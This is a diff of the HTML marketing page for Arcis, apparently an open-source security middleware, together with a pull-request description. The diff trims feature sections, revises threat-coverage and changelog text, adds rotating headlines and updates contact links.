-          <div class="diff-icon diff-icon-gold">
-            <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M4 15s1-1 4-1 5 2 8 2 4-1 4-1V3s-1 1-4 1-5-2-8-2-4 1-4 1Z"/><line x1="4" y1="22" x2="4" y2="15"/></svg>
-          </div>
-          <h3>Supply Chain Scanner</h3>
-          <p><code>arcis sca</code> detects compromised npm and PyPI packages from real-world supply chain attacks. CI exit codes included.</p>
-          <ul class="diff-detail">
-            <li>Detects trojanized axios (npm), litellm (PyPI)</li>
-            <li>Scans lockfiles, node_modules, pip packages</li>
-            <li>Finds persistent .pth backdoors</li>
-          </ul>
-        </div>
-
-        <div class="diff-card reveal reveal-delay-3">
-          <div class="diff-icon diff-icon-teal">
-            <svg width="22" height="22" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><rect x="3" y="11" width="18" height="11" rx="2" ry="2"/><path d="M7 11V7a5 5 0 0 1 10 0v4"/></svg>
-          </div>
-          <h3>Fail Open, Never Crash</h3>
-          <p>If Redis goes down, requests still flow. Availability beats denial. Your rate limiter should never take down your app.</p>
-          <ul class="diff-detail">
-            <li>Infrastructure errors allow requests through</li>
-            <li>Pluggable stores: memory (default) or Redis</li>
-            <li>Thread-safe across all three languages</li>
-          </ul>
+        <div class="why-now-stat reveal reveal-delay-2">
+          <div class="why-now-stat-num">1</div>
+          <div class="why-now-stat-text">line of Arcis replaces all of them with zero configuration</div>
         </div>
       </div>
     </div>
@@ -1289,15 +1379,9 @@
             Without Arcis
           </h3>
           <ul>
-            <li>helmet for security headers</li>
-            <li>DOMPurify for XSS sanitization</li>
-            <li>express-rate-limit for rate limiting</li>
-            <li>csurf for CSRF protection</li>
-            <li>cors for CORS handling</li>
-            <li>hpp for parameter pollution</li>
-            <li>express-validator for input validation</li>
-            <li>cookie-parser for secure cookies</li>
+            <li>helmet, DOMPurify, csurf, cors, hpp, express-rate-limit, express-validator, cookie-parser</li>
             <li>8 APIs. 8 configs. 8 update cycles.</li>
+            <li>Days of research and integration.</li>
           </ul>
         </div>
 
@@ -1309,112 +1393,15 @@
             With Arcis
           </h3>
           <ul>
-            <li>One package: <code>@arcis/node</code></li>
-            <li>One line: <code>app.use(arcis())</code></li>
-            <li>20+ flaws covered instantly</li>
-            <li>Zero dependencies to audit</li>
-            <li>Same API across 3 languages</li>
-            <li>Secure defaults, no config needed</li>
-            <li>Updates one package, not eight</li>
-            <li>Works with any framework</li>
-            <li>Ship fast. Ship safe.</li>
+            <li>One package, one line: <code>app.use(arcis())</code></li>
+            <li>20+ attack vectors covered instantly.</li>
+            <li>Zero dependencies. Zero configuration.</li>
           </ul>
         </div>
       </div>
-    </div>
-  </section>
-
-  <!-- ─── Deep Features ──────────────────────────── -->
-  <section class="section features" id="features">
-    <div class="container">
-      <div class="section-label reveal">Capabilities</div>
-      <h2 class="section-title reveal">Everything you need to secure your backend</h2>
-
-      <div class="features-grid">
-        <div class="feature-card reveal">
-          <div class="card-icon card-icon-red">
-            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10Z"/></svg>
-          </div>
-          <h3>Input Sanitization</h3>
-          <p>Strip dangerous patterns from user input before your code processes it. Remove-then-encode pipeline prevents bypass attacks.</p>
-          <ul class="feature-detail">
-            <li>XSS, SQL, NoSQL, command injection</li>
-            <li>Path traversal, SSTI, XXE, JSONP</li>
-            <li>Header injection, prototype pollution</li>
-            <li>Case-insensitive, encoding-aware matching</li>
-          </ul>
-        </div>
-
-        <div class="feature-card reveal reveal-delay-1">
-          <div class="card-icon card-icon-blue">
-            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M13 2L3 14h9l-1 8 10-12h-9l1-8z"/></svg>
-          </div>
-          <h3>Rate Limiting</h3>
-          <p>Three algorithms with pluggable storage. Per-IP isolation, automatic cleanup, and X-RateLimit-* response headers.</p>
-          <ul class="feature-detail">
-            <li>Fixed window, sliding window, token bucket</li>
-            <li>In-memory (default) or Redis store</li>
-            <li>Fail-open on infrastructure errors</li>
-            <li>Thread-safe across all languages</li>
-          </ul>
-        </div>
-
-        <div class="feature-card reveal reveal-delay-2">
-          <div class="card-icon card-icon-green">
-            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><rect x="3" y="11" width="18" height="11" rx="2" ry="2"/><path d="M7 11V7a5 5 0 0 1 10 0v4"/></svg>
-          </div>
-          <h3>Context-Aware Encoding</h3>
-          <p>Output the right encoding for every context. Prevents XSS where sanitization alone isn't enough.</p>
-          <ul class="feature-detail">
-            <li>encodeForHtml() &mdash; HTML body context</li>
-            <li>encodeForJs() &mdash; JavaScript strings</li>
-            <li>encodeForUrl() &mdash; URL parameters</li>
-            <li>encodeForCss(), encodeForAttribute()</li>
-          </ul>
-        </div>
-
-        <div class="feature-card reveal">
-          <div class="card-icon card-icon-purple">
-            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8Z"/><path d="M14 2v6h6M16 13H8M16 17H8M10 9H8"/></svg>
-          </div>
-          <h3>Input Validation</h3>
-          <p>Schema-based validation with mass assignment prevention. Only fields you define reach your code.</p>
-          <ul class="feature-detail">
-            <li>Type checking, ranges, enums, patterns</li>
-            <li>Email validation with MX verification</li>
-            <li>File upload validation (type, size, name)</li>
-            <li>Unknown fields silently dropped</li>
-          </ul>
-        </div>
-
-        <div class="feature-card reveal reveal-delay-1">
-          <div class="card-icon card-icon-gold">
-            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><circle cx="12" cy="12" r="3"/><path d="M19.4 15a1.65 1.65 0 0 0 .33 1.82l.06.06a2 2 0 0 1 0 2.83 2 2 0 0 1-2.83 0l-.06-.06a1.65 1.65 0 0 0-1.82-.33 1.65 1.65 0 0 0-1 1.51V21a2 2 0 0 1-2 2 2 2 0 0 1-2-2v-.09A1.65 1.65 0 0 0 9 19.4a1.65 1.65 0 0 0-1.82.33l-.06.06a2 2 0 0 1-2.83 0 2 2 0 0 1 0-2.83l.06-.06A1.65 1.65 0 0 0 4.68 15a1.65 1.65 0 0 0-1.51-1H3a2 2 0 0 1-2-2 2 2 0 0 1 2-2h.09A1.65 1.65 0 0 0 4.6 9a1.65 1.65 0 0 0-.33-1.82l-.06-.06a2 2 0 0 1 0-2.83 2 2 0 0 1 2.83 0l.06.06A1.65 1.65 0 0 0 9 4.68a1.65 1.65 0 0 0 1-1.51V3a2 2 0 0 1 2-2 2 2 0 0 1 2 2v.09a1.65 1.65 0 0 0 1 1.51 1.65 1.65 0 0 0 1.82-.33l.06-.06a2 2 0 0 1 2.83 0 2 2 0 0 1 0 2.83l-.06.06a1.65 1.65 0 0 0-.33 1.82V9a1.65 1.65 0 0 0 1.51 1H21a2 2 0 0 1 2 2 2 2 0 0 1-2 2h-.09a1.65 1.65 0 0 0-1.51 1z"/></svg>
-          </div>
-          <h3>Security Headers & CORS</h3>
-          <p>15 security headers set automatically. Whitelist-based CORS with Vary: Origin. Null origin blocked.</p>
-          <ul class="feature-detail">
-            <li>CSP, HSTS, X-Frame-Options, COOP</li>
-            <li>CORP, COEP, Origin-Agent-Cluster</li>
-            <li>X-Content-Type-Options, X-DNS-Prefetch</li>
-            <li>Secure cookie enforcement by default</li>
-          </ul>
-        </div>
-
-        <div class="feature-card reveal reveal-delay-2">
-          <div class="card-icon card-icon-teal">
-            <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M2 3h6a4 4 0 0 1 4 4v14a3 3 0 0 0-3-3H2z"/><path d="M22 3h-6a4 4 0 0 0-4 4v14a3 3 0 0 1 3-3h7z"/></svg>
-          </div>
-          <h3>CLI Security Tools</h3>
-          <p>Scan your codebase for vulnerabilities and compromised packages directly from the terminal.</p>
-          <ul class="feature-detail">
-            <li><code>arcis sca</code> &mdash; supply chain attack scanner</li>
-            <li><code>arcis scan</code> &mdash; vulnerability scanner</li>
-            <li><code>arcis audit</code> &mdash; static analysis (14 rules)</li>
-            <li>CI-friendly exit codes</li>
-          </ul>
-        </div>
-      </div>
+      <p class="reveal" style="text-align: center; margin-top: 2rem; color: var(--text-muted); font-size: 0.95rem;">
+        See the full side-by-side comparison with other tools <a href="#comparison" style="color: var(--accent); font-weight: 500;">below &darr;</a>
+      </p>
     </div>
   </section>
 
@@ -1448,15 +1435,15 @@
           <div class="pipeline-num">3</div>
           <div class="pipeline-content">
             <h3>Input Sanitization</h3>
-            <p>Strip XSS, SQL injection, NoSQL, command injection, path traversal, SSTI, XXE, JSONP, header injection, prototype pollution, HTTP parameter pollution.</p>
-            <span class="pipeline-tag">11 attack vectors neutralized</span>
+            <p>Strip XSS, SQL injection, NoSQL, command injection, path traversal, SSTI, XXE, JSONP, header injection, prototype pollution.</p>
+            <span class="pipeline-tag">10 attack vectors neutralized</span>
           </div>
         </div>
         <div class="pipeline-step reveal reveal-delay-3" data-step="3">
           <div class="pipeline-num">4</div>
           <div class="pipeline-content">
             <h3>CSRF Verification</h3>
-            <p>Double-submit cookie with constant-time token comparison. Token accepted via header or request body only &mdash; query string tokens rejected to prevent log leakage. Per-request <code>skipCsrf</code> callback supported.</p>
+            <p>Double-submit cookie pattern with constant-time token comparison. Prevents timing side-channel attacks.</p>
             <span class="pipeline-tag">403 CSRF Token Invalid</span>
           </div>
         </div>
@@ -1472,7 +1459,7 @@
           <div class="pipeline-num">6</div>
           <div class="pipeline-content">
             <h3>Response Hardening</h3>
-            <p>16 security headers, secure cookies (HttpOnly, Secure, SameSite), CORS enforcement, error scrubbing &mdash; all applied automatically.</p>
+            <p>15 security headers, secure cookies (HttpOnly, Secure, SameSite), CORS enforcement, error scrubbing &mdash; all applied automatically.</p>
             <span class="pipeline-tag">headers + cookies + error scrubbing</span>
           </div>
         </div>
@@ -1508,7 +1495,7 @@
               <span class="keyword">import</span> <span class="punctuation">{</span> <span class="function">arcis</span> <span class="punctuation">}</span> <span class="keyword">from</span> <span class="string">'@arcis/node'</span><span class="punctuation">;</span><br>
               <span class="keyword">import</span> express <span class="keyword">from</span> <span class="string">'express'</span><span class="punctuation">;</span><br><br>
               <span class="keyword">const</span> app = <span class="function">express</span><span class="punctuation">();</span><br>
-              app.<span class="function">use</span><span class="punctuation">(</span><span class="function">arcis</span><span class="punctuation">());</span> <span class="comment">// All 20+ protections active</span><br><br>
+              app.<span class="function">use</span><span class="punctuation">(</span><span class="function">arcis</span><span class="punctuation">());</span> <span class="comment">// All core protections active — add CSRF, CORS, bot detection as needed</span><br><br>
               app.<span class="function">get</span><span class="punctuation">(</span><span class="string">'/'</span><span class="punctuation">,</span> <span class="punctuation">(</span>req<span class="punctuation">,</span> res<span class="punctuation">)</span> <span class="keyword">=></span> <span class="punctuation">{</span><br>
               &nbsp;&nbsp;<span class="comment">// req.query and req.body are already sanitized</span><br>
               &nbsp;&nbsp;res.<span class="function">json</span><span class="punctuation">({</span> message<span class="punctuation">:</span> <span class="string">'Safe and sound.'</span> <span class="punctuation">});</span><br>
@@ -1529,7 +1516,7 @@
               <span class="keyword">from</span> fastapi <span class="keyword">import</span> FastAPI<br>
               <span class="keyword">from</span> arcis <span class="keyword">import</span> ArcisMiddleware<br><br>
               app = <span class="function">FastAPI</span><span class="punctuation">()</span><br>
-              app.<span class="function">add_middleware</span><span class="punctuation">(</span>ArcisMiddleware<span class="punctuation">)</span> <span class="comment"># All 20+ protections active</span><br><br>
+              app.<span class="function">add_middleware</span><span class="punctuation">(</span>ArcisMiddleware<span class="punctuation">)</span> <span class="comment"># All core protections active — add CSRF, CORS, bot detection as needed</span><br><br>
               <span class="keyword">@</span>app.<span class="function">get</span><span class="punctuation">(</span><span class="string">"/"</span><span class="punctuation">)</span><br>
               <span class="keyword">def</span> <span class="function">root</span><span class="punctuation">():</span><br>
               &nbsp;&nbsp;&nbsp;&nbsp;<span class="comment"># Input already sanitized and validated</span><br>
@@ -1554,7 +1541,7 @@
               <span class="punctuation">)</span><br><br>
               <span class="keyword">func</span> <span class="function">main</span><span class="punctuation">()</span> <span class="punctuation">{</span><br>
               &nbsp;&nbsp;&nbsp;&nbsp;r <span class="punctuation">:=</span> gin.<span class="function">Default</span><span class="punctuation">()</span><br>
-              &nbsp;&nbsp;&nbsp;&nbsp;r.<span class="function">Use</span><span class="punctuation">(</span>arcisgin.<span class="function">Middleware</span><span class="punctuation">())</span> <span class="comment">// All 20+ protections active</span><br>
+              &nbsp;&nbsp;&nbsp;&nbsp;r.<span class="function">Use</span><span class="punctuation">(</span>arcisgin.<span class="function">Middleware</span><span class="punctuation">())</span> <span class="comment">// All core protections active — add CSRF, CORS, bot detection as needed</span><br>
               &nbsp;&nbsp;&nbsp;&nbsp;r.<span class="function">Run</span><span class="punctuation">()</span><br>
               <span class="punctuation">}</span>
             </div>
@@ -1565,17 +1552,17 @@
   </section>
 
   <!-- ─── Threat Coverage ─────────────────────────── -->
-  <section class="section" id="threats">
+  <section class="section" id="threats" style="background: var(--bg-warm);">
     <div class="container">
       <div class="section-label reveal">Protection</div>
-      <h2 class="section-title reveal">20+ security flaws. One package.</h2>
+      <h2 class="section-title reveal">20+ attack vectors. One package.</h2>
       <p class="section-desc reveal" style="max-width: 700px;">
         Covers OWASP Top 10 and beyond. From injection attacks to response hardening &mdash; if it can hurt your app, Arcis handles it.
       </p>
 
       <div class="threats-grid">
         <div class="threat-item reveal"><div class="threat-name">XSS</div><div class="threat-desc">Script injection, event handlers, javascript: URIs, SVG payloads</div></div>
-        <div class="threat-item reveal"><div class="threat-name">SQL Injection</div><div class="threat-desc">Strips known SQL patterns from input as defense-in-depth. Not a replacement for parameterized queries — use both.</div></div>
+        <div class="threat-item reveal"><div class="threat-name">SQL Injection</div><div class="threat-desc">Keywords, boolean logic, comments, time-based blind</div></div>
         <div class="threat-item reveal"><div class="threat-name">NoSQL Injection</div><div class="threat-desc">35 MongoDB operators: $gt, $where, $regex, $function</div></div>
         <div class="threat-item reveal"><div class="threat-name">Command Injection</div><div class="threat-desc">Shell metacharacters, subshells, redirections, newlines</div></div>
         <div class="threat-item reveal"><div class="threat-name">Path Traversal</div><div class="threat-desc">../ sequences, encoded variants, double-encoding, null bytes</div></div>
@@ -1584,16 +1571,12 @@
         <div class="threat-item reveal"><div class="threat-name">CSRF</div><div class="threat-desc">Double-submit cookie, constant-time token comparison</div></div>
         <div class="threat-item reveal"><div class="threat-name">SSTI</div><div class="threat-desc">Jinja2, Twig, Freemarker, ERB, Pug, Python dunder chains</div></div>
         <div class="threat-item reveal"><div class="threat-name">XXE</div><div class="threat-desc">DOCTYPE, ENTITY, SYSTEM/PUBLIC references stripped</div></div>
-        <div class="threat-item reveal"><div class="threat-name">Rate Limiting</div><div class="threat-desc">Application-level — fixed, sliding window, token bucket, memory or Redis. Complements proxy/CDN-level limiting, not a replacement.</div></div>
-        <div class="threat-item reveal"><div class="threat-name">Security Headers</div><div class="threat-desc">CSP, HSTS, X-Frame-Options, COOP, CORP, COEP &mdash; 16 total</div></div>
+        <div class="threat-item reveal"><div class="threat-name">Rate Limiting</div><div class="threat-desc">Fixed, sliding window, token bucket &mdash; memory or Redis</div></div>
+        <div class="threat-item reveal"><div class="threat-name">Security Headers</div><div class="threat-desc">CSP, HSTS, X-Frame-Options, COOP, CORP, COEP &mdash; 15 total</div></div>
         <div class="threat-item reveal"><div class="threat-name">Bot Detection</div><div class="threat-desc">80+ patterns, 7 categories, behavioral fingerprinting</div></div>
         <div class="threat-item reveal"><div class="threat-name">Open Redirect</div><div class="threat-desc">Absolute URLs, javascript:, protocol-relative, backslash</div></div>
         <div class="threat-item reveal"><div class="threat-name">Error Leakage</div><div class="threat-desc">Stack traces, DB errors, internal IPs, connection strings</div></div>
         <div class="threat-item reveal"><div class="threat-name">Header Injection</div><div class="threat-desc">CRLF injection, response splitting, null bytes stripped</div></div>
-        <div class="threat-item reveal"><div class="threat-name">HTTP Parameter Pollution</div><div class="threat-desc">Duplicate query/body params normalized, last-value-wins, per-param whitelist</div></div>
-        <div class="threat-item reveal"><div class="threat-name">CSRF Hardening</div><div class="threat-desc">Per-request skipCsrf callback, __Host- cookie prefix enforcement</div></div>
-        <div class="threat-item reveal"><div class="threat-name">Unsafe Deserialization</div><div class="threat-desc">Static analysis detects pickle.loads, eval, unsafe YAML in audit rules</div></div>
-        <div class="threat-item reveal"><div class="threat-name">SSRF via Code</div><div class="threat-desc">Audit detects user-controlled URLs passed to fetch/requests/http.Get</div></div>
       </div>
     </div>
   </section>
@@ -1635,11 +1618,72 @@
     </div>
   </section>
 
+  <!-- ─── Who It's For ──────────────────────────── -->
+  <section class="section" style="background: var(--bg-warm);">
+    <div class="container">
+      <div class="section-label reveal">Built For</div>
+      <h2 class="section-title reveal">Who uses Arcis</h2>
+
+      <div class="audience-grid">
+        <div class="audience-card reveal">
+          <h3>Solo developers</h3>
+          <p>You're shipping fast, using Copilot or Cursor, and you don't have time to wire up 8 security libraries. Arcis handles the baseline so you can focus on the product.</p>
+        </div>
+        <div class="audience-card reveal reveal-delay-1">
+          <h3>Small teams</h3>
+          <p>No dedicated security engineer. One install covers what would otherwise take weeks of research and configuration. Defaults are secure out of the box.</p>
+        </div>
+        <div class="audience-card reveal reveal-delay-2">
+          <h3>Established companies</h3>
+          <p>Adding Arcis to an existing project takes one line. No refactoring, no breaking changes. Runs alongside whatever security you already have.</p>
+        </div>
+      </div>
+    </div>
+  </section>
+
+  <!-- ─── Recently Shipped ──────────────────────── -->
+  <section class="section">
+    <div class="container">
+      <div class="section-label reveal" style="text-align: center;">Active Development</div>
+      <h2 class="section-title reveal" style="text-align: center;">Recently shipped</h2>
+      <p class="section-desc reveal" style="max-width: 600px; margin: 0 auto; text-align: center;">
+        Arcis is actively maintained and hardened continuously. Every release closes real bypass vectors found during security audits.
+      </p>
+
+      <div class="changelog-list">
+        <div class="changelog-item reveal">
+          <span class="changelog-version">v1.4.2</span>
+          <span class="changelog-text">12 security bypass vectors closed. SSTI and XXE parity added to Go. Unicode path traversal bypass fixed across all SDKs.</span>
+        </div>
+        <div class="changelog-item reveal reveal-delay-1">
+          <span class="changelog-version">v1.4.1</span>
+          <span class="changelog-text">LDAP injection protection added. Filter operator and DN character escaping across Node.js, Python, and Go.</span>
+        </div>
+        <div class="changelog-item reveal reveal-delay-2">
+          <span class="changelog-version">v1.4.0</span>
+          <span class="changelog-text">HPP (HTTP Parameter Pollution) protection. CSRF hardening with double-submit cookie and HMAC. 14 static analysis audit rules.</span>
+        </div>
+        <div class="changelog-item reveal reveal-delay-3">
+          <span class="changelog-version">v1.3.0</span>
+          <span class="changelog-text">Supply chain attack scanner (arcis sca). Context-aware output encoding. 15 security headers including COOP, CORP, COEP.</span>
+        </div>
+      </div>
+
+      <div style="text-align: center; margin-top: 2.5rem;">
+        <a href="https://github.com/Gagancm/arcis/releases" target="_blank" rel="noopener" class="btn-outline">
+          View all releases
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2" style="margin-left: 0.4rem; vertical-align: middle;"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </section>
+
   <!-- ─── Closing Quote ───────────────────────────── -->
   <section class="section closing-quote">
     <div class="container">
-      <blockquote class="reveal">
-        "We don't just flag what <em>might</em> be vulnerable.<br>We strip the danger before your code ever sees it."
+      <blockquote class="reveal quote-rotate">
+        <span class="rotate-line" data-index="0">"Most apps ship with zero security layer.<br>Arcis exists so <em>yours</em> doesn't have to."</span>
+        <span class="rotate-line" data-index="1">"We don't just flag what <em>might</em> be vulnerable.<br>We strip the danger before your code ever sees it."</span>
       </blockquote>
     </div>
   </section>
@@ -1681,6 +1725,15 @@
           View on GitHub
         </a>
       </div>
+
+      <div class="reveal" style="margin-top: 3rem; padding-top: 2.5rem; border-top: 1px solid rgba(255,255,255,0.1);">
+        <p style="color: rgba(255,255,255,0.6); font-size: 0.9rem; margin-bottom: 1rem; text-align: center;">Plus CLI tools for your dev workflow:</p>
+        <div style="display: flex; flex-wrap: wrap; gap: 1rem; justify-content: center; max-width: 700px; margin: 0 auto;">
+          <code style="background: rgba(255,255,255,0.05); padding: 0.5rem 1rem; border-radius: 6px; font-size: 0.85rem; color: #fff;">arcis sca <span style="color: rgba(255,255,255,0.5);">— supply chain scanner</span></code>
+          <code style="background: rgba(255,255,255,0.05); padding: 0.5rem 1rem; border-radius: 6px; font-size: 0.85rem; color: #fff;">arcis scan <span style="color: rgba(255,255,255,0.5);">— vulnerability scanner</span></code>
+          <code style="background: rgba(255,255,255,0.05); padding: 0.5rem 1rem; border-radius: 6px; font-size: 0.85rem; color: #fff;">arcis audit <span style="color: rgba(255,255,255,0.5);">— static analysis</span></code>
+        </div>
+      </div>
     </div>
   </section>
 
@@ -1688,15 +1741,18 @@
   <section class="section contact" id="contact">
     <div class="container">
       <div class="section-label reveal">Get In Touch</div>
-      <h2 class="section-title reveal">Questions? Feedback? Integrations?</h2>
+      <h2 class="section-title reveal">Built by one developer. Open to everyone.</h2>
+      <p class="section-desc reveal" style="max-width: 650px;">
+        Arcis is maintained by <a href="https://github.com/Gagancm" style="color: var(--accent); font-weight: 500;">Gagan CM</a>. If you're using it, found a bug, want to contribute, or want to chat about security or integrations — reach out.
+      </p>
 
       <div class="contact-options">
         <div class="contact-card reveal">
           <div class="card-icon card-icon-purple" style="margin: 0 auto 1rem;">
             <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z"/></svg>
           </div>
-          <h3>Community</h3>
-          <p>Ask questions, share feedback, and get help from the community.</p>
+          <h3>Ask a question</h3>
+          <p>Feature requests, usage questions, or just curious how something works under the hood.</p>
           <a href="https://github.com/Gagancm/arcis/discussions" target="_blank" rel="noopener" class="btn-primary">GitHub Discussions</a>
         </div>
 
@@ -1704,8 +1760,8 @@
           <div class="card-icon card-icon-red" style="margin: 0 auto 1rem;">
             <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><circle cx="12" cy="12" r="10"/><line x1="12" y1="8" x2="12" y2="12"/><line x1="12" y1="16" x2="12.01" y2="16"/></svg>
           </div>
-          <h3>Report a Bug</h3>
-          <p>Found something wrong? Help us make Arcis more secure for everyone.</p>
+          <h3>Report a vulnerability</h3>
+          <p>Found a bypass, false positive, or something that should be blocked but isn't? That's exactly what I want to hear about.</p>
           <a href="https://github.com/Gagancm/arcis/issues" target="_blank" rel="noopener" class="btn-primary">Open an Issue</a>
         </div>
 
@@ -1713,9 +1769,9 @@
           <div class="card-icon card-icon-teal" style="margin: 0 auto 1rem;">
             <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z"/><polyline points="22,6 12,13 2,6"/></svg>
           </div>
-          <h3>Contact</h3>
-          <p>Enterprise integrations, partnerships, or just want to say hello.</p>
-          <a href="https://github.com/Gagancm" target="_blank" rel="noopener" class="btn-primary">Reach Out</a>
+          <h3>Connect directly</h3>
+          <p>Using Arcis in production? Want to partner, collaborate, or just chat about web security?</p>
+          <a href="https://www.linkedin.com/in/gagancm/" target="_blank" rel="noopener" class="btn-primary">LinkedIn</a>
         </div>
       </div>
     </div>
@@ -1727,7 +1783,7 @@
       <div class="footer-inner">
         <div class="footer-brand">
           <div class="footer-logo">Arcis<span>.</span></div>
-          <p class="footer-tagline">Security middleware for every backend. One line of code, 20+ flaws handled, zero core dependencies.</p>
+          <p class="footer-tagline">Security middleware for every backend. One line of code, 20+ attack vectors handled, zero dependencies.</p>
           <div class="footer-badges">
             <span class="footer-badge">
               <svg width="12" height="12" viewBox="0 0 16 16" fill="rgba(255,255,255,0.5)"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
@@ -1741,8 +1797,8 @@
           <div class="footer-col">
             <h4>Product</h4>
             <ul>
-              <li><a href="#features">Features</a></li>
               <li><a href="#how-it-works">How It Works</a></li>
+              <li><a href="#languages">Languages</a></li>
               <li><a href="#threats">Threat Coverage</a></li>
               <li><a href="#comparison">Comparison</a></li>
               <li><a href="#get-started">Get Started</a></li>
@@ -1868,6 +1924,24 @@
         }
       })
       .catch(() => {});
+
+    // ─── Rotating headlines ──────────────────────
+    function setupRotation(selector, interval) {
+      const containers = document.querySelectorAll(selector);
+      containers.forEach(container => {
+        const lines = container.querySelectorAll('.rotate-line');
+        if (lines.length < 2) return;
+        lines[0].classList.add('active');
+        let current = 0;
+        setInterval(() => {
+          lines[current].classList.remove('active');
+          current = (current + 1) % lines.length;
+          lines[current].classList.add('active');
+        }, interval);
+      });
+    }
+    setupRotation('.hero-rotate', 4000);
+    setupRotation('.quote-rotate', 5000);
   </script>
 </body>
 </html>


### PR DESCRIPTION
## Summary

- New documentation site at \`website/documentation/\` (7 pages, shared CSS, sidebar nav)
- Marketing site trimmed and polished (rotating headlines, cut redundant sections, added Why Now + Who It's For + Recently Shipped)
- Named \`documentation/\` instead of \`docs/\` since \`docs/\` is gitignored

## Docs site

| Page | Purpose |
|------|---------|
| \`index.html\` | Overview with cards linking to all sections |
| \`getting-started.html\` | Install + setup per language |
| \`frameworks.html\` | Express, FastAPI, Flask, Django, Gin, Echo, net/http |
| \`configuration.html\` | All config options with tables |
| \`attack-vectors.html\` | Every attack type Arcis blocks |
| \`api-reference.html\` | Every exported function per SDK |
| \`cli.html\` | arcis sca / audit / scan |

- Claude-style top nav + left sidebar + main content layout
- Same theme as marketing site (colors, fonts, spacing)
- GA4 tracking and live GitHub star count on every page
- Mobile-responsive

## Marketing site changes

- Hero badge: v1.3.0 → v1.4.2
- Hero headline rotates between two variants
- Closing quote rotates between two variants
- Removed 'Differentiators' and 'Features' sections (redundant with Pipeline + Threats grid)
- Added 'Why Now' (AI angle), 'Who It's For', 'Recently Shipped' changelog
- Alternating section backgrounds so adjacent sections don't visually merge
- CLI tools callout in CTA section
- Nav 'Docs' link updated to \`/documentation/\`

## Test plan

- [ ] Open / locally, verify all sections render
- [ ] Open /documentation/, navigate through all 7 pages
- [ ] Verify GitHub star count shows on all pages
- [ ] Verify mobile layout works
- [ ] Once merged, verify GitHub Pages deploys correctly